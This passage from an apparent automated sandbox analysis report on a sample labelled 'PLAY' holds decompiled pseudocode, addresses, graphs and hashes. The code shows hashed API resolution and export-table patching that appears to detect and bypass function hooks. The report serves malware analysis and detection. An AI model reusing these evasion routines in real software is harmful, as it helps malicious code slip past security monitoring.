				 *((short*)(_t533 - 8)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 6)) = 0;
				asm("movq [ebp-0x10], xmm0");
				E00AED430(_t299, 0xb0c9d0, 0xb, _t521, _t525, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x10);
				_t230 = LoadLibraryA(_t533 - 0x10); // executed
				_t526 = _t230;
				 *((short*)(_t533 - 8)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 6)) = 0;
				asm("movq [ebp-0x10], xmm0");
				 *0xb0d674 = E00AEC4D0(_t230, _t299, _t230, 0x3728416, _t521, _t230);
				 *0xb0d6ac = E00AEC4D0(_t231, _t299, _t230, 0x655814ab, _t521, _t230);
				 *0xb0d668 = E00AEC4D0(_t232, _t299, _t230, 0xaf4ebaa3, _t521, _t230);
				 *0xb0d5ec = E00AEC4D0(_t233, _t299, _t526, 0x75242930, _t521, _t526);
				 *0xb0d624 = E00AEC4D0(_t234, _t299, _t526, 0xe99a892d, _t521, _t526);
				 *0xb0d634 = E00AEC4D0(_t235, _t299, _t526, 0x1c0520bc, _t521, _t526);
				 *0xb0d604 = E00AEC4D0(_t236, _t299, _t526, 0x13e001e1, _t521, _t526);
				 *0xb0d610 = E00AEC4D0(_t237, _t299, _t526, 0x5ed4555b, _t521, _t526);
				 *0xb0d6bc = E00AEC4D0(_t238, _t299, _t526, 0x69efe534, _t521, _t526);
				 *((intOrPtr*)(_t533 - 0x30)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 0x2c)) = 0;
				asm("movq [ebp-0x38], xmm0");
				E00AED430(_t299, 0xb0c9b4, 0xd, _t521, _t526, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x38);
				_t243 = LoadLibraryA(_t533 - 0x38); // executed
				 *((intOrPtr*)(_t533 - 0x30)) = 0;
				 *((char*)(_t533 - 0x2c)) = 0;
				asm("xorps xmm0, xmm0");
				 *((short*)(_t533 - 0x14)) = 0;
				asm("movq [ebp-0x38], xmm0");
				asm("movq [ebp-0x1c], xmm0");
				 *((char*)(_t533 - 0x12)) = 0;
				E00AED430(_t299, 0xb0c9a8, 0xb, _t521, _t243, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x1c);
				_t247 = LoadLibraryA(_t533 - 0x1c); // executed
				asm("xorps xmm0, xmm0");
				 *((short*)(_t533 - 0x14)) = 0;
				asm("movq [ebp-0x1c], xmm0");
				 *((char*)(_t533 - 0x12)) = 0;
				 *0xb0d68c = E00AEC4D0(_t247, _t299, _t247, 0x90306fbe, _t521, _t243);
				 *0xb0d670 = E00AEC4D0(_t248, _t299, _t243, 0x86c9eb3e, _t521, _t243);
				 *((intOrPtr*)(_t533 - 0x40)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 0x3c)) = 0;
				asm("movq [ebp-0x48], xmm0");
				E00AED430(_t299, 0xb0c998, 0xd, _t521, _t243, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x48);
				_t253 = LoadLibraryA(_t533 - 0x48); // executed
				_t528 = _t253;
				 *((intOrPtr*)(_t533 - 0x40)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 0x3c)) = 0;
				asm("movq [ebp-0x48], xmm0");
				 *0xb0d6d4 = E00AEC4D0(_t253, _t299, _t253, 0x62f6d148, _t521, _t253);
				 *0xb0d6f0 = E00AEC4D0(_t254, _t299, _t253, 0x5579be9b, _t521, _t253);
				 *0xb0d6d8 = E00AEC4D0(_t255, _t299, _t253, 0x8cdfdcca, _t521, _t253);
				 *0xb0d5f4 = E00AEC4D0(_t256, _t299, _t528, 0x93d7992d, _t521, _t528);
				 *((short*)(_t533 - 0x20)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 0x1e)) = 0;
				asm("movq [ebp-0x28], xmm0");
				E00AED430(_t299, 0xb0ba34, 0xb, _t521, _t528, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x28);
				_t261 = LoadLibraryA(_t533 - 0x28); // executed
				_t529 = _t261;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x28], xmm0");
				 *((short*)(_t533 - 0x20)) = 0;
				 *((char*)(_t533 - 0x1e)) = 0;
				 *0xb0d628 = E00AEC4D0(_t261, _t299, _t261, 0x2fed0495, _t521, _t261);
				 *0xb0d690 = E00AEC4D0(_t262, _t299, _t261, 0x804afea2, _t521, _t261);
				 *0xb0d704 = E00AEC4D0(_t263, _t299, _t261, 0x9779c961, _t521, _t261);
				 *0xb0d640 = E00AEC4D0(_t264, _t299, _t529, 0x41a8781a, _t521, _t529);
				 *0xb0d644 = E00AEC4D0(_t265, _t299, _t529, 0x291bae13, _t521, _t529);
				 *0xb0d6e4 = E00AEC4D0(_t266, _t299, _t529, 0x4a722d5e, _t521, _t529);
				 *0xb0d6a4 = E00AEC4D0(_t267, _t299, _t529, 0x7c7c9794, _t521, _t529);
				 *0xb0d6ec = E00AEC4D0(_t268, _t299, _t529, 0x593d69ce, _t521, _t529);
				 *0xb0d6f8 = E00AEC4D0(_t269, _t299, _t529, 0x13fa12a3, _t521, _t529);
				 *((intOrPtr*)(_t533 - 0x70)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x78], xmm0");
				E00AED430(_t299, 0xb0c7d4, 0xc, _t521, _t529, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x78);
				_t274 = LoadLibraryA(_t533 - 0x78); // executed
				asm("xorps xmm0, xmm0");
				 *((intOrPtr*)(_t533 - 0x70)) = 0;
				asm("movq [ebp-0x78], xmm0");
				 *0xb0d64c = E00AEC4D0(_t274, _t299, _t274, 0x39c58c36, _t521, _t529);
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x6c], xmm0");
				E00AED430(_t299, 0xb0c9dc, 8, _t521, _t529, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x6c);
				_t279 = LoadLibraryA(_t533 - 0x6c); // executed
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x6c], xmm0");
				 *0xb0d694 = E00AEC4D0(_t279, _t299, _t279, 0xd439d6f3, _t521, _t279);
				 *0xb0d6d0 = E00AEC4D0(_t280, _t299, _t279, 0x32c0a6dc, _t521, _t279);
				 *((intOrPtr*)(_t533 - 0x50)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 0x4c)) = 0;
				asm("movq [ebp-0x58], xmm0");
				E00AED430(_t299, 0xb0c988, 0xd, _t521, _t279, _t638,  *0xb0d720,  *0xb0d724, _t533 - 0x58);
				_t285 =  *((intOrPtr*)( *0xb0d6f4))(_t533 - 0x58, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1);
				 *((intOrPtr*)(_t533 - 0x50)) = 0;
				asm("xorps xmm0, xmm0");
				 *((char*)(_t533 - 0x4c)) = 0;
				_push(1);
				asm("movq [ebp-0x58], xmm0");
				E00AEC4D0(E00AEC4D0(_t285, _t299, _t285, 0x824afb51, _t521, _t285), _t299, _t285, 0x19968912, _t521, _t285);
				return E00AF7B30( *(_t533 - 4) ^ _t533, 1);
			}




































          0x00aec7b0
          0x00aec7b0
          0x00aec7b0
          0x00aec7b0
          0x00aec80a
          0x00aec80f
          0x00aec815
          0x00aec81a
          0x00aec821
          0x00aec827
          0x00aec82f
          0x00aec840
          0x00aec843
          0x00aec849
          0x00aec850
          0x00aec857
          0x00aec859
          0x00aec85f
          0x00aec862
          0x00aec869
          0x00aec86b
          0x00aec86b
          0x00aec862
          0x00aec875
          0x00aec886
          0x00aec894
          0x00aec8a1
          0x00aec8a3
          0x00aec8b8
          0x00aec8d4
          0x00aec8d6
          0x00aec8dc
          0x00aec8e9
          0x00aec8f6
          0x00aec909
          0x00aec909
          0x00aec90f
          0x00aec923
          0x00aec940
          0x00aec945
          0x00aec947
          0x00aec94f
          0x00aec95a
          0x00aec970
          0x00aec973
          0x00aec97c
          0x00aec97e
          0x00aec98c
          0x00aec998
          0x00aec99f
          0x00aec9bc
          0x00aec9be
          0x00aec9cc
          0x00aec9d8
          0x00aec9e2
          0x00aec9ee
          0x00aec9fe
          0x00aeca18
          0x00aeca5b
          0x00aeca61
          0x00aeca67
          0x00aeca74
          0x00aeca78
          0x00aeca7e
          0x00aeca1a
          0x00aeca21
          0x00aeca28
          0x00aeca32
          0x00aeca36
          0x00aeca3c
          0x00aeca3f
          0x00aeca3f
          0x00aeca84
          0x00aeca92
          0x00aeca9d
          0x00aeca9f
          0x00aecaad
          0x00aecab9
          0x00aecabb
          0x00aecac7
          0x00aecafb
          0x00aecb01
          0x00aecb07
          0x00aecac9
          0x00aecad8
          0x00aecae7
          0x00aecaea
          0x00aecaea
          0x00aecb0a
          0x00aecb1b
          0x00aecb27
          0x00aecb31
          0x00aecb3d
          0x00aecb47
          0x00aecb53
          0x00aecb5d
          0x00aecb69
          0x00aecb6b
          0x00aecb7a
          0x00aecb84
          0x00aecb90
          0x00aecb9a
          0x00aecba6
          0x00aecbb0
          0x00aecbbc
          0x00aecbca
          0x00aecbdd
          0x00aecbe2
          0x00aecbec
          0x00aecbf8
          0x00aecbfa
          0x00aecbff
          0x00aecc06
          0x00aecc1c
          0x00aecc26
          0x00aecc2a
          0x00aecc38
          0x00aecc3d
          0x00aecc46
          0x00aecc4b
          0x00aecc5a
          0x00aecc61
          0x00aecc6b
          0x00aecc77
          0x00aecc81
          0x00aecc8d
          0x00aecc97
          0x00aecca3
          0x00aecca5
          0x00aeccbd
          0x00aeccc0
          0x00aeccca
          0x00aeccd6
          0x00aecce0
          0x00aeccec
          0x00aeccf9
          0x00aecd12
          0x00aecd14
          0x00aecd24
          0x00aecd30
          0x00aecd32
          0x00aecd32
          0x00aecd4d
          0x00aecd63
          0x00aecd79
          0x00aecd8f
          0x00aecda5
          0x00aecdbb
          0x00aecdc9
          0x00aecde2
          0x00aecdf8
          0x00aece0e
          0x00aece24
          0x00aece32
          0x00aece43
          0x00aece54
          0x00aece65
          0x00aece6d
          0x00aece76
          0x00aece7e
          0x00aece95
          0x00aecea8
          0x00aeceaa
          0x00aeceb0
          0x00aecebc
          0x00aecec9
          0x00aecedf
          0x00aecef5
          0x00aecf0b
          0x00aecf21
          0x00aecf29
          0x00aecf2f
          0x00aecf32
          0x00aecf3b
          0x00aecf52
          0x00aecf63
          0x00aecf65
          0x00aecf67
          0x00aecf6d
          0x00aecf70
          0x00aecf7b
          0x00aecf8a
          0x00aecfa0
          0x00aecfb6
          0x00aecfcc
          0x00aecfe2
          0x00aecff8
          0x00aed00e
          0x00aed024
          0x00aed03a
          0x00aed042
          0x00aed049
          0x00aed04c
          0x00aed055
          0x00aed06c
          0x00aed07d
          0x00aed081
          0x00aed08b
          0x00aed096
          0x00aed099
          0x00aed0aa
          0x00aed0b4
          0x00aed0b9
          0x00aed0bd
          0x00aed0ce
          0x00aed0d0
          0x00aed0d3
          0x00aed0e0
          0x00aed0e7
          0x00aed0f3
          0x00aed109
          0x00aed111
          0x00aed118
          0x00aed11b
          0x00aed124
          0x00aed13b
          0x00aed14c
          0x00aed14e
          0x00aed150
          0x00aed157
          0x00aed15a
          0x00aed165
          0x00aed174
          0x00aed18a
          0x00aed1a0
          0x00aed1b6
          0x00aed1be
          0x00aed1c4
          0x00aed1c7
          0x00aed1d0
          0x00aed1e7
          0x00aed1f8
          0x00aed1fa
          0x00aed1fc
          0x00aed206
          0x00aed20d
          0x00aed213
          0x00aed21f
          0x00aed235
          0x00aed24b
          0x00aed261
          0x00aed277
          0x00aed28d
          0x00aed2a3
          0x00aed2b9
          0x00aed2cf
          0x00aed2d7
          0x00aed2de
          0x00aed2eb
          0x00aed2fd
          0x00aed30e
          0x00aed310
          0x00aed313
          0x00aed321
          0x00aed330
          0x00aed338
          0x00aed347
          0x00aed357
          0x00aed368
          0x00aed36c
          0x00aed376
          0x00aed385
          0x00aed39b
          0x00aed3a3
          0x00aed3aa
          0x00aed3ad
          0x00aed3b6
          0x00aed3cd
          0x00aed3de
          0x00aed3e2
          0x00aed3e9
          0x00aed3ec
          0x00aed3f0
          0x00aed3f7
          0x00aed40f
          0x00aed42e

          APIs
          • LoadLibraryA.KERNELBASE(?), ref: 00AECF63
          • LoadLibraryA.KERNELBASE(?), ref: 00AED07D
          • LoadLibraryA.KERNELBASE(?), ref: 00AED0CE
          • LoadLibraryA.KERNELBASE(?), ref: 00AED14C
          • LoadLibraryA.KERNELBASE(?), ref: 00AED1F8
          • LoadLibraryA.KERNELBASE(?), ref: 00AED30E
          • LoadLibraryA.KERNELBASE(?), ref: 00AED368
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: LibraryLoad
          • String ID: $gU~$0)$u$4i$Cicw48T$^-rJ$~jMZ
          • API String ID: 1029625771-3292267380
          • Opcode ID: d4c636092b81d69d4b25861da5367eb3453acc8226363729b73c27e0daff2dee
          • Instruction ID: 2c4c37c3a1ed194254c256c0fcf7232af1003a7a35e7ddb58358e230e2d2c544
          • Opcode Fuzzy Hash: d4c636092b81d69d4b25861da5367eb3453acc8226363729b73c27e0daff2dee
          • Instruction Fuzzy Hash: 48620CF0F402944FEB11EBA5AC267BE3EB1AB64314F104169E40D9B3D2EF725945CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE5409 Relevance: 14.2, Strings: 11, Instructions: 441COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 683 ae5409-ae5416 684 ae5418 683->684 685 ae5483 683->685 686 ae548a-ae5757 685->686 687 ae5485-ae5489 685->687 688 ae576b-ae582f call aee7e0 686->688 689 ae5759 686->689 687->686 694 ae5834-ae583a 688->694 690 ae575b-ae5762 689->690 691 ae5764-ae5766 689->691 690->688 690->691 693 ae5b01-ae5b0b 691->693 695 ae5b0d-ae5b2a 693->695 696 ae5b46-ae5b48 693->696 697 ae583c-ae584c 694->697 698 ae5851-ae587b call ae4d10 694->698 700 ae5b30-ae5b38 695->700 701 ae5b4e-ae5b65 696->701 702 ae5c16-ae5c29 call af7b30 696->702 697->693 703 ae5880-ae58b6 698->703 700->700 705 ae5b3a-ae5b40 700->705 706 ae5c2a-ae5c2c 701->706 707 ae5b6b-ae5b73 701->707 708 ae5a8c 703->708 709 ae58bc-ae58bf 703->709 705->696 711 ae5cb6-ae5cb9 706->711 712 ae5c32-ae5c3f call af8bb0 706->712 713 ae5b89-ae5b97 707->713 714 ae5b75-ae5b88 call af7b30 707->714 715 ae5a93-ae5a96 708->715 709->708 718 ae58c5 709->718 716 ae5ccf-ae5ce4 call af7b30 711->716 719 ae5cbb-ae5cce call af7b30 711->719 729 ae5c44-ae5c79 call ae5cf0 712->729 713->716 717 ae5b9d-ae5bf9 call ae7000 713->717 722 ae5abc-ae5ac6 715->722 723 ae5a98-ae5a9f 715->723 738 ae5c03-ae5c0c 717->738 725 ae58c7-ae58ce 718->725 726 ae58d4-ae5995 call aee7e0 718->726 722->693 733 ae5ac8-ae5afa 722->733 723->722 731 ae5aa1-ae5ab5 723->731 725->708 725->726 739 ae599a-ae59a0 726->739 740 ae5c7e-ae5c8d 729->740 731->722 733->693 738->738 741 ae5c0e-ae5c10 738->741 742 ae59cb-ae59d1 739->742 743 ae59a2-ae59c6 739->743 744 ae5c93-ae5c9c 740->744 741->702 741->716 746 ae5a0c-ae5a3e 742->746 747 ae59d3-ae5a0a 742->747 743->693 744->744 745 ae5c9e-ae5ca0 744->745 745->716 748 ae5ca2-ae5cb5 call af7b30 745->748 749 ae5a44-ae5a5c call ae4d10 746->749 747->749 753 ae5a61-ae5a8a 749->753 753->715
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: !$8d$/a$:!$$BU/"$U4$YS'$eHT7QT$mP19L4$m_[A$o`S$qD
          • API String ID: 0-300048039
          • Opcode ID: 9c0975bb23a5884f824da40f3ffc5c896d26d16c124135aac1f116687d1d5ea7
          • Instruction ID: c3073f7f12c8269e53bbdfe410f2314217d4816174ea1c3cc6d0e58e6732422d
          • Opcode Fuzzy Hash: 9c0975bb23a5884f824da40f3ffc5c896d26d16c124135aac1f116687d1d5ea7
          • Instruction Fuzzy Hash: EB22ACB0D056A88ACB248F259DA03EDBB70EF55315F4051EAD68DA7282DB354FC5CF09
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE1CAC Relevance: 2.0, APIs: 1, Instructions: 456COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 57%
          			E00AE1CAC(void* __eax, void* __ebx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr _t147;
				void* _t149;
				signed int _t151;
				void* _t157;
				void* _t166;
				_Unknown_base(*)()* _t168;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				void* _t174;
				void* _t175;
				void* _t177;
				void* _t178;
				_Unknown_base(*)()* _t193;
				void* _t196;
				intOrPtr _t245;
				intOrPtr _t246;
				_Unknown_base(*)()* _t249;
				intOrPtr* _t252;
				intOrPtr _t256;
				void* _t257;
				void* _t265;
				_Unknown_base(*)() _t276;
				intOrPtr _t291;
				signed char _t295;
				signed short* _t325;
				signed int* _t332;
				intOrPtr _t355;
				CHAR* _t357;
				CHAR* _t360;
				intOrPtr _t368;
				CHAR* _t379;
				signed int* _t380;
				void* _t382;
				struct HINSTANCE__* _t383;
				struct HINSTANCE__* _t385;
				signed int _t389;
				void* _t396;
				void* _t397;
				void* _t404;
				void* _t411;
				void* _t425;
				intOrPtr* _t426;
				void* _t433;

				_t433 = __fp0;
				asm("ficom word [edi]");
				asm("lds ebx, [fs:ebx-0x25cf192f]");
				asm("sbb ch, dl");
				asm("movsb");
				asm("cmc");
				_t256 =  *0xb0d6c8; // 0xcafce887
				_t145 = E00AEDEC0(__ebx, _t256, 0x44b05fc8, __esi);
				_t245 =  *((intOrPtr*)(_t389 - 0x260));
				_t257 = _t389 - 0x270;
				_t146 =  *_t145(_t245, _t257);
				if(_t146 != 0) {
					_t368 =  *((intOrPtr*)(_t389 - 0x270));
					_t147 = E00AEE070(_t146, _t257, _t368, _t257, 4); // executed
					_t355 = _t147;
					_t397 = _t396 + 8;
					 *((intOrPtr*)(_t389 - 0x288)) = _t355;
					if(_t355 != 0) {
						_push(_t257);
						 *((intOrPtr*)(_t389 - 0x264)) = 0;
						_push(_t389 - 0x264);
						_push(_t368);
						_t149 = E00AEE2E0(_t245, _t355, _t355, _t368); // executed
						_t398 = _t397 + 0xc;
						_t259 = _t245;
						_t369 = _t149; // executed
						E00AEE450(_t149, _t245); // executed
						if(_t149 != 0) {
							_t246 =  *((intOrPtr*)(_t389 - 0x288));
							_t371 =  &(( *(_t246 + 0x3c))[_t246]);
							_t151 = ( &(( *(_t246 + 0x3c))[_t246]))[0x18] & 0x0000ffff;
							if(_t151 != 0x10b) {
								if(_t151 != 0x20b) {
									E00AEE110(_t246, _t246, _t355, _t371);
									return E00AF7B30( *(_t389 - 4) ^ _t389, 0x20b);
								} else {
									_t265 = 0x88;
									goto L14;
								}
							} else {
								_t265 = 0x78;
								L14:
								_t357 = _t246 + E00AE1380(_t151, _t246,  *((intOrPtr*)(_t265 + _t371)), _t246, _t355, _t371);
								 *(_t389 - 0x28c) = _t357;
								_t373 = _t246 + E00AE1380(_t155, _t246,  *((intOrPtr*)(_t246 + _t155 + 0x20)), _t246, _t357, _t371);
								 *((intOrPtr*)(_t389 - 0x298)) = _t246 + E00AE1380(_t155, _t246,  *((intOrPtr*)(_t246 + _t155 + 0x20)), _t246, _t357, _t371);
								_t157 = E00AE1380(_t156, _t246, _t357[0x24], _t246, _t357, _t373);
								_t269 =  *(_t246 + 0x3c);
								 *((intOrPtr*)(_t389 - 0x2a0)) = 0;
								_t325 = _t246 + _t157;
								 *(_t389 - 0x29c) = _t325;
								 *(_t389 - 0x290) = ( *(_t246 + 0x3c))[_t246 + 0x34];
								if(_t357[0x18] <= 0) {
									L44:
									E00AEE110(_t246, _t246, _t357, _t373); // executed
									return E00AF7B30( *(_t389 - 4) ^ _t389, _t269);
								} else {
									do {
										_t375 =  *_t325 & 0x0000ffff;
										_t357 = _t246 + E00AE1380(E00AE1380( *(_t389 - 0x28c), _t246, ( *(_t389 - 0x28c))[0x1c], _t246,  *_t373,  *_t325 & 0x0000ffff) + _t246, _t246,  *_t373, _t246,  *_t373, E00AE1380( *(_t389 - 0x28c), _t246, ( *(_t389 - 0x28c))[0x1c], _t246,  *_t373,  *_t325 & 0x0000ffff) + _t246 + _t375 * 4);
										 *(_t389 - 0x284) = _t357;
										_t166 = E00AE1380(_t165, _t246,  *((intOrPtr*)(E00AE1380( *(_t389 - 0x28c), _t246, ( *(_t389 - 0x28c))[0x1c], _t246,  *_t373,  *_t325 & 0x0000ffff) + _t246 + _t375 * 4)), _t246, _t357, E00AE1380( *(_t389 - 0x28c), _t246, ( *(_t389 - 0x28c))[0x1c], _t246,  *_t373,  *_t325 & 0x0000ffff) + _t246 + _t375 * 4);
										_t377 = _t166 + _t246;
										 *((intOrPtr*)(_t389 - 0x274)) = _t166 + _t246;
										_t168 = GetProcAddress( *( *(_t389 - 0x280)), _t357); // executed
										_t249 = _t168;
										 *(_t389 - 0x278) = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_t276 =  *_t249;
											if(_t276 == 0xe9 || _t276 == 0xff) {
												_push(1);
												_t171 = E00AE1000(_t168, _t249, _t249, _t377, _t357, _t377);
												_t398 = _t398 + 4;
												if(_t171 == 0) {
													goto L43;
												} else {
													_t332 =  *(_t389 - 0x294);
													_t379 = 0;
													 *(_t389 - 0x27c) = 0;
													_t172 =  *_t332;
													if(_t172 == 0) {
														_t360 =  *(_t389 - 0x2a4);
													} else {
														_t360 =  *((intOrPtr*)(_t172 * 0x210 + _t332[2] - 0x20c)) + 0x11;
													}
													 *((char*)(_t389 - 0x18)) = 0;
													_push(_t389 - 0x30);
													asm("xorps xmm0, xmm0");
													asm("movq [ebp-0x20], xmm0");
													asm("movups [ebp-0x30], xmm0");
													_t174 = E00AED430(_t249, 0xb0b894, 0x19, _t360, _t379, _t433);
													_t404 = _t398 - 8 + 0xc;
													_t175 = E00AE1190(_t174, _t249,  *(_t389 - 0x284), _t389 - 0x30, _t360, _t379);
													 *((char*)(_t389 - 0x18)) = 0;
													asm("xorps xmm0, xmm0");
													asm("movq [ebp-0x20], xmm0");
													asm("movups [ebp-0x30], xmm0");
													if(_t175 == 0) {
														_t221 =  *((intOrPtr*)(_t389 - 0x274));
														if( *((char*)( *((intOrPtr*)(_t389 - 0x274)))) == 0x6a) {
															_push(7);
															_t385 =  *( *(_t389 - 0x280));
															E00AE10D0(_t249, _t389 - 0xc, _t221, _t360, _t385);
															 *((intOrPtr*)(_t389 - 0x260)) = 0;
															_push(4);
															E00AE10D0(_t249, _t389 - 0x260, _t389 - 9, _t360, _t385);
															 *((intOrPtr*)(_t389 - 0x260)) =  *((intOrPtr*)(_t389 - 0x260)) -  *(_t389 - 0x290) + _t385;
															_push(4);
															E00AE10D0(_t249, _t389 - 9, _t389 - 0x260, _t360, _t385);
															_push(7);
															E00AE10D0(_t249, _t360, _t389 - 0xc, _t360, _t385);
															 *((char*)(_t389 - 0x259)) = 0xe9;
															_push(1);
															 *((intOrPtr*)(_t389 - 0x260)) = _t249 - _t360 - 5;
															E00AE10D0(_t249,  &(_t360[7]), _t389 - 0x259, _t360, _t385);
															_push(4);
															E00AE10D0(_t249,  &(_t360[8]), _t389 - 0x260, _t360, _t385);
															_t404 = _t404 + 0x18;
															 *(_t389 - 0x27c) = _t360;
															_t379 = 1;
														}
													}
													 *((intOrPtr*)(_t389 - 0x34)) = 0;
													_push(_t389 - 0x44);
													asm("xorps xmm0, xmm0");
													asm("movups [ebp-0x44], xmm0");
													_t177 = E00AED430(_t249, 0xb0b880, 0x14, _t360, _t379, _t433);
													_t398 = _t404 - 8 + 0xc;
													_t178 = E00AE1190(_t177, _t249,  *(_t389 - 0x284), _t389 - 0x44, _t360, _t379);
													 *((intOrPtr*)(_t389 - 0x34)) = 0;
													asm("xorps xmm0, xmm0");
													asm("movups [ebp-0x44], xmm0");
													if(_t178 != 0) {
														if(_t379 != 0) {
															L39:
															_t357 =  *(_t389 - 0x27c);
															goto L40;
														} else {
															_t193 =  *(_t389 - 0x278);
															_t252 =  *((intOrPtr*)(_t389 - 0x274)) - _t193;
															while(1) {
																_t291 = _t379 + _t193;
																_push(6);
																_t196 = E00AE1000(6 - _t379, _t252, _t291, _t291 + _t252, _t360, _t379);
																_t398 = _t398 + 4;
																if(_t196 == 0) {
																	break;
																}
																_t193 =  *(_t389 - 0x278);
																_t379 = _t379 + 1;
																if(_t379 < 6) {
																	continue;
																} else {
																	L34:
																	_t411 = _t398 - 8;
																	if(0x49 == 0x73) {
																		_t411 = _t411 + 0x182;
																	}
																	_t398 = _t411 + 8;
																	E00AE2187(0x49);
																	_t360[0x75] = _t360[0x75] | 0x0000003c;
																	asm("aam 0x59");
																	asm("retf 0x6f81");
																	gs = _t411 + 8;
																	_t295 =  *_t252;
																	 *_t252 = _t291;
																	asm("insb");
																	asm("in al, dx");
																	 *(_t389 * 4 - 0x1fe13dad) =  *(_t389 * 4 - 0x1fe13dad) << _t295;
																}
																goto L49;
															}
															if(_t379 != 0xffffffff) {
																_t131 = _t379 - 1; // -1
																if(_t131 > 4) {
																	_t249 =  *(_t389 - 0x278);
																	goto L39;
																} else {
																	_push(_t379);
																	E00AE10D0(_t252, _t360,  *((intOrPtr*)(_t389 - 0x274)), _t360, _t379);
																	_t249 =  *(_t389 - 0x278);
																	 *((char*)(_t389 - 0x259)) = 0xe9;
																	_t382 = _t379 + _t360;
																	_push(1);
																	 *((intOrPtr*)(_t389 - 0x260)) = _t249 - _t360 - 5;
																	E00AE10D0(_t249, _t382, _t389 - 0x259, _t360, _t382);
																	_t137 = _t382 + 1; // 0x1
																	_push(4);
																	E00AE10D0(_t249, _t137, _t389 - 0x260, _t360, _t382);
																	_t398 = _t398 + 0xc;
																}
																goto L40;
															} else {
																goto L34;
															}
														}
													} else {
														_push(7);
														_t383 =  *( *(_t389 - 0x280));
														E00AE10D0(_t249, _t389 - 0x14,  *((intOrPtr*)(_t389 - 0x274)), _t360, _t383);
														 *((intOrPtr*)(_t389 - 0x260)) = 0;
														_push(4);
														E00AE10D0(_t249, _t389 - 0x260, _t389 - 0x12, _t360, _t383);
														 *((intOrPtr*)(_t389 - 0x260)) =  *((intOrPtr*)(_t389 - 0x260)) -  *(_t389 - 0x290) + _t383;
														_push(4);
														E00AE10D0(_t249, _t389 - 0x12, _t389 - 0x260, _t360, _t383);
														_push(7);
														E00AE10D0(_t249, _t360, _t389 - 0x14, _t360, _t383);
														 *((char*)(_t389 - 0x259)) = 0xe9;
														_push(1);
														 *((intOrPtr*)(_t389 - 0x260)) = _t249 - _t360 - 5;
														E00AE10D0(_t249,  &(_t360[7]), _t389 - 0x259, _t360, _t383);
														_push(4);
														E00AE10D0(_t249,  &(_t360[8]), _t389 - 0x260, _t360, _t383);
														_t398 = _t398 + 0x18;
														L40:
														if(_t357 == 0) {
															goto L43;
														} else {
															_t380 =  *(_t389 - 0x294);
															_t282 =  *_t380;
															if( *_t380 + 1 >= _t380[1]) {
																E00AEE110(_t249,  *((intOrPtr*)(_t389 - 0x288)), _t357, _t380);
																return E00AF7B30( *(_t389 - 4) ^ _t389, _t282);
															} else {
																E00AFA1C0(_t380[2] + 8 + _t282 * 0x210, 0x104,  *(_t389 - 0x284));
																E00AFA1C0(_t380[2] + 0x10c +  *_t380 * 0x210, 0x104, _t389 - 0x258);
																_t398 = _t398 + 0x18;
																 *( *_t380 * 0x210 + _t380[2] + 4) = _t357;
																 *( *_t380 * 0x210 + _t380[2]) = _t249;
																 *_t380 =  *_t380 + 1;
																goto L43;
															}
														}
													}
												}
											} else {
												goto L43;
											}
										}
										goto L49;
										L43:
										_t269 =  *(_t389 - 0x28c);
										_t170 =  *((intOrPtr*)(_t389 - 0x2a0)) + 1;
										_t373 =  *((intOrPtr*)(_t389 - 0x298)) + 4;
										_t246 =  *((intOrPtr*)(_t389 - 0x288));
										_t325 =  &(( *(_t389 - 0x29c))[1]);
										 *((intOrPtr*)(_t389 - 0x298)) =  *((intOrPtr*)(_t389 - 0x298)) + 4;
